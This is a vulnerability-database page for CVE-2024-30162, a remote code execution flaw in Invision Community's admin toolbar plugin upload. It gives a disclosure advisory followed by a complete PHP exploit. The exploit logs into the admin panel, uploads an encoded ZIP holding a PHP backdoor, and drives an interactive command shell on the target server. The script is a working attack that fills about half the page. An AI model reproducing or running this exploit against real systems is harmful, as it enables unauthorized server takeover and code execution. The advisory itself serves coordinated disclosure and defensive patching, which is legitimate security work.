Vulners
Lucene search
Invision Community 4.7.16 Remote Code Execution Vulnerability
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Invision Community Security Breach | 7 Jun 202400:00 | – | cnnvd |
 | CVE-2024-30162 | 7 Jun 202400:00 | – | cve |
 | CVE-2024-30162 | 7 Jun 202400:00 | – | cvelist |
 | CVE-2024-30162 | 7 Jun 202417:15 | – | nvd |
 | Invision Community 4.7.16 Remote Code Execution | 8 Apr 202400:00 | – | packetstorm |
 | PT-2024-23216 · Invision Power Services · Invision Community | 8 Apr 202400:00 | – | ptsecurity |
 | CVE-2024-30162 | 23 May 202506:29 | – | redhatcve |
 | CVE-2024-30162 | 7 Jun 202400:00 | – | vulnrichment |
------------------------------------------------------------------------------
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability
------------------------------------------------------------------------------
[-] Software Link:
https://invisioncommunity.com
[-] Affected Versions:
Version 4.7.16 and prior versions.
[-] Vulnerability Description:
The vulnerability is located in the
/applications/core/modules/admin/editor/toolbar.php script.
Specifically, into the
IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will
handle
the upload of a ZIP file, trying to extract its content into the
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if
the ZIP archive does not include
a plugin.js file, then the extracted ZIP content will be recursively
deleted from the file system,
otherwise it will stay there. This can be exploited to execute
arbitrary PHP code by uploading a
ZIP archive containing a plugin.js file (which can also be empty)
along with a PHP file. Successful
exploitation of this vulnerability requires an Administrator account
having the "toolbar_manage" permission.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2024-30162.php
[-] Solution:
No official solution is currently available.
[-] Disclosure Timeline:
[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure
[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed
[20/03/2024] - CVE identifier requested
[24/03/2024] - CVE identifier assigned
[05/04/2024] - Coordinated public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2024-30162 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Other References:
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/
[-] Original Advisory:
http://karmainsecurity.com/KIS-2024-03
-----------------------
PoC:
<?php
/*
------------------------------------------------------------------------------
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability
------------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.
Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will
handle the upload of a ZIP file, trying to extract its content into the
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does
not include a plugin.js file, then the extracted ZIP content will be recursively deleted
from the file system, otherwise it will stay there. This can be exploited to execute
arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can
also be empty) along with a PHP file. Successful exploitation of this vulnerability
requires an Administrator account having the "toolbar_manage" permission.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2024-03
*/
set_time_limit(0);
error_reporting(E_ERROR);
if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");
$url = $argv[1];
$email = $argv[2];
$passwd = $argv[3];
$ch = curl_init();
@unlink('./cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');
print "[+] Logging into AdminCP\n";
curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");
if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");
print "[+] Uploading malicious ZIP file\n";
curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
$plg = md5(time()).".zip";
@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));
$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");
print "[+] Launching shell\n";
curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");
curl_setopt($ch, CURLOPT_POST, false);
$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";
while(1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.2
EPSS0.00511
SSVC